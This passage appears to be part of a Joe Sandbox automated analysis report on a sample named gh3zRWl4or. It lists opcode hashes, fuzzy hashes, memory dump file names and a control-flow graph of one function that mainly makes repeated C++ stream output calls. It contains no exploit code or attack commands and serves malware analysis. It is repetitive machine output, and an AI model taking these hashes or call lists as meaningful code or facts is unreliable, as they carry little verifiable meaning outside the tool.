                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 762bf655720ca0e0ea74a3ee70b7a3f4346d3bdf29b0cc9da0aa969e6db57ae6
                                                                                                                                                                          • Instruction ID: 8e32f8cd514f190b9d412bc3c2745d57715a0c6f2d29bd5e0b547f48bc49fe84
                                                                                                                                                                          • Opcode Fuzzy Hash: 762bf655720ca0e0ea74a3ee70b7a3f4346d3bdf29b0cc9da0aa969e6db57ae6
                                                                                                                                                                          • Instruction Fuzzy Hash: 9DA1F973D2A24AC9E657A5B750CA3F8AF506F2A784F18CB36DE0CB6491EF2574D4C600
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6416da2f5b4f1d51f4e756dd382aec6323b1d20c255575b13c00517e6d870856
                                                                                                                                                                          • Instruction ID: bbe5ae01b49bbd5e27644c0cd7b63d0d0a6b9d3da8d132a676647bfc62f82343
                                                                                                                                                                          • Opcode Fuzzy Hash: 6416da2f5b4f1d51f4e756dd382aec6323b1d20c255575b13c00517e6d870856
                                                                                                                                                                          • Instruction Fuzzy Hash: 93A1AF33A28AD4CAE702DF7A90852FCBBB0BB49349F159335DE5562A65DF386581CB00
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                          • Instruction ID: 4c6a413154730c4e9bb1ad7ab3da1830f28f5e4ebef60fe829c73ec9f10dff56
                                                                                                                                                                          • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                          • Instruction Fuzzy Hash: 145128A76744B187DA509F2AD8C26BC7790E74AB43FE48076D658C2F91C93DC14ADF20
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                          • Instruction ID: 0a30376e66a3c4d849d8475ba890b1a07df75a84d89c6a1836dab606c9b479f2
                                                                                                                                                                          • Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                          • Instruction Fuzzy Hash: C241E533E5D359C5E521A62351C81796292AFAAB80F5EC732ED4CA7A84EF38F4819701
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                          • Instruction ID: ef9a2ae243a979197d62f48ff2651bfd965327f71ede3a0cb5f9068dfdb7236f
                                                                                                                                                                          • Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                          • Instruction Fuzzy Hash: 13416073B2154487E78CCE3AD856AAD33A6E399304F55C239EB0AC7385DF399906CB44
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
                                                                                                                                                                          • Instruction ID: 2bbc364abd6e34c13331e408ff91dec298d0297c7e33dc3e0ad681981107994f
                                                                                                                                                                          • Opcode Fuzzy Hash: e620470d19bf88a54e58a3ff6a60801cd6e360028fe19ccb035e9b9c1eaf177f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E310437734A5687EB488638E936B782691E345384FC9A539EE5AC66C2EF3DD4508700

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 818 7ff674173420-7ff67417388a memset call 7ff6741894e0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff674189c20 823 7ff6741738ac-7ff67417390f call 7ff674189470 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff67418c910 818->823 824 7ff67417388c-7ff6741738ab ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 818->824 824->823
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF674173450
                                                                                                                                                                            • Part of subcall function 00007FF6741894E0: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418951B
                                                                                                                                                                            • Part of subcall function 00007FF6741894E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF67418953A
                                                                                                                                                                            • Part of subcall function 00007FF6741894E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418956C
                                                                                                                                                                            • Part of subcall function 00007FF6741894E0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189587
                                                                                                                                                                            • Part of subcall function 00007FF6741894E0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741895D3
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417346F
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417347F
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173491
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734A1
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741734B3
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734C3
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741734D5
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741734E5
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6741734F6
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173506
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173517
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173527
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173538
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173548
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417355A
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417356A
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF67417357B
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417358B
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417359D
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735AD
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF6741735BE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735CE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741735E0
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741735F0
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173602
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173612
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173624
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173634
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173646
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173656
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173668
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173678
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF67417368A
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF67417369A
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736AC
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741736BC
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736CE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741736DE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741736F0
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173700
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173712
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173722
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173734
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173744
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173756
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173766
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF674173779
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173789
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z.MSVCP140 ref: 00007FF67417379C
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737AC
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741737BE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737CE
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF6741737E0
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF6741737F0
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173802
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173812
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173824
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173834
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF674173845
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173855
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF674173867
                                                                                                                                                                          • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF674173877
                                                                                                                                                                            • Part of subcall function 00007FF674189C20: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189C80
                                                                                                                                                                            • Part of subcall function 00007FF674189C20: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6741894CA,?,?,?,00007FF674189974), ref: 00007FF674189CA2
                                                                                                                                                                          • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741738A5
                                                                                                                                                                          • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6741738E3
                                                                                                                                                                          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF6741738ED
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
